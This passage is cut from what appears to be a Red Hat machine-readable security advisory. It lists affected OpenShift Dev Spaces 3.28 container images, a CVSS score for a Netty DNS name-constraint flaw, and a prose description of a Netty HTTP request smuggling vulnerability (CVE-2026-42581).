"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement"
},
{
"cve": "CVE-2026-42581",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:02:26.404511+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477232"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw. Netty\u0027s HttpObjectDecoder, used across various Red Hat products, improperly handles conflicting `Transfer-Encoding: chunked` and `Content-Length` headers in HTTP/1.0 requests. This allows a remote attacker to perform HTTP request smuggling, potentially bypassing security controls or gaining unauthorized access to information due to misinterpretation of message boundaries by downstream proxies or handlers.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
